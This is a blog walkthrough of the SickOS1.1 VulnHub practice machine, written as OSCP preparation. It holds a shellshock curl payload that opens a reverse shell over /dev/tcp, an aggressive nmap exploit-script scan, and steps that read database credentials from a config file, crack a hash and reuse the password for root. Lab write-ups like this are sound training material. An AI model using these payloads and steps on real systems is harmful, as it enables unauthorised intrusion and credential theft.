SickOS1.1 Walkthrough

Once I had the VM powered on, I ran a netdiscover to grab it’s IP

I had both SickOS1 & 2 running, which were IP’s & 106

I then ran a more intense nmap scan, looking for more services, default accounts, vulnerabilities and exploits. This scan is extremely noisy, any IDS should go nuts if you run it. Good for testing on what to alert on 🙂

nmap -sV -Pn -vv -T4 –A -p- –script=auth,brute,discovery,exploit,vuln -oN

The scan only found two ports open, 22 & 3128.

OpenSSH 5.9p1, Ubuntu Linux and a squid 3.1.19 proxy

I first started my enumeration by browsing to the proxy, which gave me an error message:

I wanted to see if I could proxy my traffic through squid and browse other sites on the machine, so i modified my browsers proxy settings:

Then, browsing to the site over port 80 returned:

I ran dirbuster against the site through the proxy to see what others pages I could find

Cgi-bin could reveal some important info about the machine. I also found index.php, and an icons directory which denies my access.

Next, I scanned the site with nikto, using the SickOS’s proxy. It scanned cgi-bin and found a potential shellshock vulnerability

Looks like we might have an in! I issued the following curl command through the proxy to exploit shellshock, and connect back to our computer on port 1234.

curl -x -A “() { :; };/bin/sh -i >& /dev/tcp/ 0>&1”

I setup a netcat listener on my kali box and the machine connected back with the user www-data

After going through the system, I noticed another site/app on the box, wolfcms

Checking the files for something interesting, I landed on the config.php file. Inside was a MySQL username and password for the root user

I used this info to login and view the databases, then changed to the mysql db and listed tables

After displaying the “user” tables contents with “select * from user”, I found the sickos and root users password hashes

I used to crack the hash and reveal the pw of “john@123”

I decided to turn to the ssh service. I knew a couple users on the system from cating passwd, root & sickos. I only had one password from the box “john@123,” so I tried it on the users.

“john@123” wasn’t the password for the root user But it was reused for the sickos user!

First thing I usually try is “sudo -i”, see if the user has root privileges, and it turned out, we could sudo to root!

I listed the contents in the root directory and found the VM’s flag!

After my OSCP lab time was over, I started practicing for my exam on additional vulnhub boxes. This was the first box I attempted and it provided a great example of how to exploit shellshock via curl.

Leave a Reply

Your email address will not be published. Required fields are marked *